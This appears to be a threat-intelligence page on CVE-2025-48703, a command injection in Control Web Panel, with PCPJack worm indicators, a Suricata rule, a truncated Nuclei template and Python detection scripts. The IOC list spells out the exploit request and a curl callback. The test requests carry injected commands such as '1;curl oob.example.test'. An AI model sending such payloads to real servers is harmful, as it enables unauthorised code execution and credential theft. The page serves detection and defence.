CVE-2025-48703
Published 2025-09-19
Priority: P1 (99) · critical · 9.0 (CVSS 3.1)
Vector: AV:N / AC:H / PR:N / UI:N / S:C / C:H / I:H / A:H
Tags: KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-11-25
Exploited in the wild
EPSS: 99.59% (99.9th percentile)
CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| centos-webpanel | centos_web_panel | < 0.9.8.1205 | 0.9.8.1205 |
| control-webpanel | webpanel | < 0.9.8.1205 | 0.9.8.1205 |
Detection & IOCs (extracted from sources)
url: POST /{{username}}/index.php?module=filemanager&acc=changePerm
path: /login/index.php
other: Server: cwpsrv
command: curl {{interactsh-url}}
- Exploit targets the `t_total` parameter in a multipart POST to `/<username>/index.php?module=filemanager&acc=changePerm`. Shell metacharacters in `t_total` (e.g., a `curl` out-of-band callback) are passed to a shell, giving RCE as the specified user.
- Fingerprint CWP instances via the HTTP response header `Server: cwpsrv` and confirm with the body strings `Control WebPanel` and `cwp` on the login page (`/login/index.php`) before exploitation.
- PCPJack drops its orchestrator to disk as `monitor.py` under `/var/lib/.spm/` and installs a `sys-monitor.service` systemd unit for persistence. Detect unexpected systemd services with this name.
- PCPJack stores its working files under the hidden directory `/var/lib/.spm/`. Presence of this directory, or of the files `monitor.py`, `utils.py`, `_lat.py`, `_cu.py`, `_cr.py`, `_csc.py` within it, is a strong indicator of compromise.
- Sliver C2 binaries are dropped to `/var/tmp/apt-daily-upgrade` (x86_64), alongside `update-386.bin` and `update-arm.bin` variants. Monitor for ELF binaries in `/var/tmp/` with these names.
- Exfiltration traffic is sent to Telegram C2 channels. Credentials are encrypted with X25519 ECDH + ChaCha20-Poly1305, split into 2800-byte chunks, and each chunk is prefixed with a 🔒 emoji. Monitor for outbound Telegram API traffic from server-class hosts.
- The attacker-controlled X25519 recipient public key embedded in `crypto_util.py` is `6d4imqQ/s/GfQCVcybdcjfTe/PMYHtZN8ZGHnEXSbRo=`. Presence of this string in any file on disk is a high-confidence IOC.
- Check Point IPS signature name for this CVE is `CentOS Web Panel Command Injection (CVE-2025-48703)`. Use this signature name when querying IPS/SIEM logs.
- PCPJack's credential harvesting uses a `harvest.jsonl` file on disk. Presence of this file in unexpected locations (e.g., home directories, /tmp) indicates active credential harvesting.
- The second-stage credential harvester (`check.sh`) reads `/proc/*/environ` to extract secrets from running process environments. Monitor for scripts or processes accessing `/proc/*/environ` at scale.
- Exploitation requires prior knowledge of a valid non-root username on the target CWP instance. No credentials are needed, but the username is embedded in the URL path, so without one the request cannot be formed.
- The Nuclei template is marked `verified: false` and relies on an out-of-band (interactsh) DNS callback for confirmation. Treat a run as positive only if the callback is observed; the HTTP response alone is insufficient, and a missing callback (egress filtering, DNS not resolving) produces a false negative rather than proof of a patched host.
- If the `cryptography` Python library is absent on the victim host, PCPJack silently falls back to sending credentials in plaintext to the C2, so exfiltrated data is not encrypted in every infection.
- The bootstrap script deletes itself after execution (`rm -f "$0"`), removing forensic evidence of the initial infection vector from disk.
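The PCPJack host indicators above (the `/var/lib/.spm/` directory and its Python files, the `sys-monitor.service` unit, the Sliver binaries in `/var/tmp/`, `harvest.jsonl`, and the recipient public key string) are worth sweeping across a fleet in a single pass. The script below is an added example written for this page, not code from any of the cited reports or from PCPJack itself. Which systemd unit directories to check, and which trees to content-scan for the key string and `harvest.jsonl` (`/var/lib`, `/var/tmp`, `/tmp`, `/home`, `/root`, `/opt`), are assumptions; `run_demo` lays down a constructed fake infection in a temporary directory so the sweep can be exercised offline.

```python
import os
import tempfile
from pathlib import Path

# Indicators as listed on this page (paths are relative to the swept root).
X25519_RECIPIENT_KEY = b"6d4imqQ/s/GfQCVcybdcjfTe/PMYHtZN8ZGHnEXSbRo="
IOC_DIRS = ["var/lib/.spm"]
IOC_FILES = [
    "var/lib/.spm/monitor.py", "var/lib/.spm/utils.py", "var/lib/.spm/_lat.py",
    "var/lib/.spm/_cu.py", "var/lib/.spm/_cr.py", "var/lib/.spm/_csc.py",
    "var/tmp/apt-daily-upgrade", "var/tmp/update-386.bin", "var/tmp/update-arm.bin",
]
UNIT_NAME = "sys-monitor.service"
HARVEST_NAME = "harvest.jsonl"
# Assumptions, not from the page: where unit files live, and which trees to
# content-scan for harvest.jsonl and the recipient key string.
UNIT_DIRS = ["etc/systemd/system", "usr/lib/systemd/system", "lib/systemd/system"]
SCAN_DIRS = ["var/lib", "var/tmp", "tmp", "home", "root", "opt"]
MAX_SCAN_BYTES = 8 * 1024 * 1024


def _is_elf(path):
    try:
        with path.open("rb") as fh:
            return fh.read(4) == b"\x7fELF"
    except OSError:
        return False


def _regular_files(top):
    # os.walk silently yields nothing for a missing directory.
    for dirpath, _dirs, names in os.walk(top, followlinks=False):
        for name in names:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                yield p


def sweep(root="/"):
    """Return 'kind:relative/path' strings for every indicator found under root."""
    root = Path(root)
    hits = []
    for rel in IOC_DIRS:
        if (root / rel).is_dir():
            hits.append(f"dir:{rel}")
    for rel in IOC_FILES:
        p = root / rel
        if p.is_file():
            hits.append(("elf:" if _is_elf(p) else "file:") + rel)
    for d in UNIT_DIRS:
        if (root / d / UNIT_NAME).exists():
            hits.append(f"unit:{d}/{UNIT_NAME}")
    for base in SCAN_DIRS:
        for p in _regular_files(root / base):
            rel = p.relative_to(root).as_posix()
            if p.name == HARVEST_NAME:
                hits.append(f"harvest:{rel}")
            try:
                if p.stat().st_size <= MAX_SCAN_BYTES and X25519_RECIPIENT_KEY in p.read_bytes():
                    hits.append(f"key:{rel}")
            except OSError:
                continue
    return hits


def build_constructed_tree(base):
    """Lay down a constructed fake infection for an offline self-test."""
    files = {
        "var/lib/.spm/monitor.py": b"# placeholder orchestrator\n",
        "var/tmp/apt-daily-upgrade": b"\x7fELF" + b"\x00" * 60,
        "etc/systemd/system/sys-monitor.service": b"[Unit]\nDescription=placeholder\n",
        "home/user1/harvest.jsonl": b"{}\n",
        "opt/x/crypto_util.py": b"RECIPIENT = '" + X25519_RECIPIENT_KEY + b"'\n",
    }
    for rel, data in files.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        return sweep(tmp)


if __name__ == "__main__":
    for hit in run_demo():
        print(hit)
```

Run it as root against `/`, or against a mounted evidence image with `sweep("/mnt/evidence")`. A `key:` or `unit:` hit is high confidence, and a `dir:` hit on `/var/lib/.spm` alone is strong given how unusual that name is. The size cap keeps the content scan from reading large binaries; raise it if logs or archives need checking.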
CVSS provenance
nvd: 9.0 CRITICAL (CVSS 3.1), vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck: 9.0 CRITICAL
cisa: 9.0 CRITICAL
GHSA
GHSA-vx2w-cj7g-8hcf: CWP (aka Control Web Panel or CentOS Web Panel) before 0
ghsa_unreviewed·2025-09-22
CVE-2025-48703 [CRITICAL] CWE-78 GHSA-vx2w-cj7g-8hcf: CWP (aka Control Web Panel or CentOS Web Panel) before 0
CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
VulnCheck
CWP Control Web Panel OS Command Injection Vulnerability
vulncheck·2025·CVSS 9.0
CVE-2025-48703 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command Injection vulnerability that allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Affected: CWP Control Web Panel
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-08-15&host_type=src&vulnerability=cve-2025-48703; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https:
CISA
CWP Control Web Panel OS Command Injection Vulnerability
cisa·2025-11-04·CVSS 9.0
CVE-2025-48703 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
Vulnerability: CWP Control Web Panel OS Command Injection Vulnerability
Affected: CWP Control Web Panel
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command Injection vulnerability that allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://control-webpanel.com/changelog ; https://nvd.nist.gov/vuln/detail/CVE-2025-48703
Remediation Due Date: 2025-11-25
Suricata
ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)
suricata·2025-06-25·CVSS 9.0
CVE-2025-48703 [CRITICAL] ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)
ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)
Rule: alert http any any -> $HOME_NET 2083 (msg:"ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"module|3d|filemanager"; fast_pattern; content:"acc|3d|changePerm"; http.request_body; content:"t_total"; pcre:"/^.{1,10}(?:[\x3b\x24\x27\x60\x7c]|\x25(?:3[bB]|2[47]|60|7[cC]))/R"; reference:url,fenrisk.com/rce-centos-webpanel; reference:cve,2025-48703; classtype:web-application-attack; sid:2063180; rev:1; metadata:attack_target Server, created_at 2025_06_25, cve CVE_2025_48703, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit,
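To see what the rule's body condition actually requires, here is the same logic as a standalone Python check run over constructed HTTP requests. This is an added example written for this page, not part of the ET ruleset or any cited source; the hostnames, the `user1` username and the request bodies are made up, and the only inputs taken from the page are the URI strings and the metacharacter set in the rule above.

```python
import re

# The ET rule's metacharacter set, raw (; $ ' ` |) or percent-encoded
# (%3b %24 %27 %60 %7c), within 1-10 bytes after the literal t_total.
# re.DOTALL is an addition: it lets '.' span the CRLFs a multipart body
# puts between name="t_total" and the field value.
_META_AFTER_T_TOTAL = re.compile(
    r"t_total.{1,10}?(?:[;$'`|]|%(?:3[bB]|2[47]|60|7[cC]))", re.DOTALL)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, uri, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers, body.decode("latin-1")


def is_changeperm_injection(method, uri, body):
    """Same three conditions as the signature: POST, filemanager changePerm
    in the URI, and a shell metacharacter right after t_total in the body."""
    if method != "POST":
        return False
    if "module=filemanager" not in uri or "acc=changePerm" not in uri:
        return False
    return _META_AFTER_T_TOTAL.search(body) is not None


def flag_request(raw):
    method, uri, _headers, body = parse_request(raw)
    return is_changeperm_injection(method, uri, body)


# Constructed requests (not captured traffic); host and username are placeholders.
BOUNDARY = "----cwpdemo"


def _multipart(fields):
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields.items()]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()


def _post(path, body, ctype=f"multipart/form-data; boundary={BOUNDARY}"):
    head = (f"POST {path} HTTP/1.1\r\nHost: cwp.example.test:2083\r\n"
            f"Content-Type: {ctype}\r\nContent-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


CHANGEPERM = "/user1/index.php?module=filemanager&acc=changePerm"
SAMPLE_EXPLOIT = _post(CHANGEPERM, _multipart({"t_total": "1;curl oob.example.test"}))
SAMPLE_BENIGN = _post(CHANGEPERM, _multipart({"t_total": "755"}))
SAMPLE_ENCODED = _post(CHANGEPERM, b"t_total=1%7ccurl+oob.example.test",
                       ctype="application/x-www-form-urlencoded")
SAMPLE_OTHER_ACTION = _post("/user1/index.php?module=filemanager&acc=list",
                            _multipart({"t_total": "1;id"}))

if __name__ == "__main__":
    for label, raw in [("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN),
                       ("urlencoded", SAMPLE_ENCODED), ("other action", SAMPLE_OTHER_ACTION)]:
        print(f"{label:12s} -> {flag_request(raw)}")
```

One thing to verify in a lab rather than take from the rule text: the ET pcre anchors `.{1,10}` relative to the `t_total` match and carries no `s` modifier, so `.` stops at the `\n` of the CRLF pairs that a multipart body places between `name="t_total"` and the value. The Python mirror uses `re.DOTALL` for that reason; the form-urlencoded sample, where the value follows `t_total=` on the same line, matches either way. Replay a captured exploit request through Suricata before relying on sid 2063180 for the multipart case.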
Nuclei
CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
nuclei·CVSS 9.0
CVE-2025-48703 [CRITICAL] CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
Template:
id: CVE-2025-48703
info:
  name: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
  impact: |
    Unauthenticated at
Sans Isc
TeamPCP Supply Chain Campaign: Activity Through 2026-05-17, (Mon, May 18th)
blogs_sans_isc·2026-05-18
CVE-2026-45321 TeamPCP Supply Chain Campaign: Activity Through 2026-05-17, (Mon, May 18th)
TeamPCP Supply Chain Campaign: Activity Through 2026-05-17
Published: 2026-05-18. Last Updated: 2026-05-18 20:08:00 UTC
by Kenneth Hartman (Version: 1)
Since the last update, the TeamPCP supply chain campaign produced its loudest stretch since the March Trivy disclosure: an officially confirmed Checkmarx Jenkins plugin compromise and a new self-spreading Mini Shai-Hulud worm across npm and PyPI.
Bottom line up front
Two TeamPCP events broke within 48 hours of each other and doubled attention on the campaign. Checkmarx confirmed its Jenkins AST plugin was trojanized, its third compromise in three months, validating an earlier single-researcher claim. In parallel, a new Mini Shai-Hulud worm poisoned roughly 170 npm and PyPI packages (42 @tanstack packages in about six minut
Bleepingcomputer
New PCPJack worm steals credentials, cleans TeamPCP infections
blogs_bleepingcomputer·2026-05-07·CVSS 9.1
CVE-2025-29927 [CRITICAL] New PCPJack worm steals credentials, cleans TeamPCP infections
## New PCPJack worm steals credentials, cleans TeamPCP infections
By Bill Toulas
PCPJack’s capabilities revolve mainly around credential theft, targeting cloud environments, developer systems, messenger apps, financial services, databases, SSH keys, Slack tokens, WordPress configs, OpenAI keys, Anthropic keys, Discord, DigitalOcean, and more.
The credentials are exfiltrated to Telegram channels after they are encrypted using X25519 ECDH and ChaCha20-Poly1305, and split into 2800-byte chunks respecting Telegram’s message character limits.
PCPJack propagates by scanning external cloud infrastructure for exposed services such as Docker, Kubernetes, Redis, MongoDB, and RayML, then attempts exploiting known vulnerabilities to gain access.
It also downloads hostname data from Common Crawl p
Sentinelone
PCPJack | Cloud Worm Evicts TeamPCP and Steals Credentials at Scale
blogs_sentinelone·2026-05-07
CVE-2025-29927 PCPJack | Cloud Worm Evicts TeamPCP and Steals Credentials at Scale
## PCPJack | Cloud Worm Evicts TeamPCP and Steals Credentials at Scale
## Executive Summary
SentinelLABS has identified PCPJack, a credential theft framework that worms across exposed cloud infrastructure and removes artifacts associated with TeamPCP, a threat actor persona who claimed several high-profile supply chain intrusions throughout early 2026.
The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting to spread to additional hosts.
PCPJack targets exposed services including Docker, Kubernetes, Redis, MongoDB, RayML, and vulnerable web applications, enabling both external propagation and lateral movement inside victim environments.
Unlike typical
Hackernews
PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems
blogs_hackernews·2026-05-07
CVE-2025-55182 PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems
## PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and ousts any artifacts linked to TeamPCP from the environments.
"The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting to spread to additional hosts," SentinelOne security researcher Alex Delamotte said in a report published today.
PCPJack is specifically designed to
Checkpoint
10th November – Threat Intelligence Report
blogs_checkpoint·2025-11-10
CVE-2024-38197 10th November – Threat Intelligence Report
## 10th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th November, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The US Congressional Budget Office (CBO) has confirmed a cyber attack that resulted in a suspected foreign threat actor breaching its network and potentially exposing sensitive communications between congressional offices and CBO analysts. The incident may have led to the compromise of draft reports, economic forecasts,
Greynoiseio
NoiseLetter August 2025
blogs_greynoiseio
NoiseLetter August 2025
Recorded Future
November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October
blogs_recorded_future·CVSS 5.4
CVE-2025-64446 [MEDIUM] November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October
# November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October
November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 10 vulnerabilities requiring immediate attention, down from 32 in October.
What security teams need to know:
- Fortinet leads concerns: Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation
- LANDFALL spyware campaign: Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks
- Public exploits proliferate: Seven of ten vulnerabilities have public proof-of-concept code available
- OS Command Injection and Out-of-bounds Write were tied as the most common weakness types
Bottom line: Th
Timeline
2025-09-19: Published
2025-11-04: Added to CISA KEV
Exploited in the wild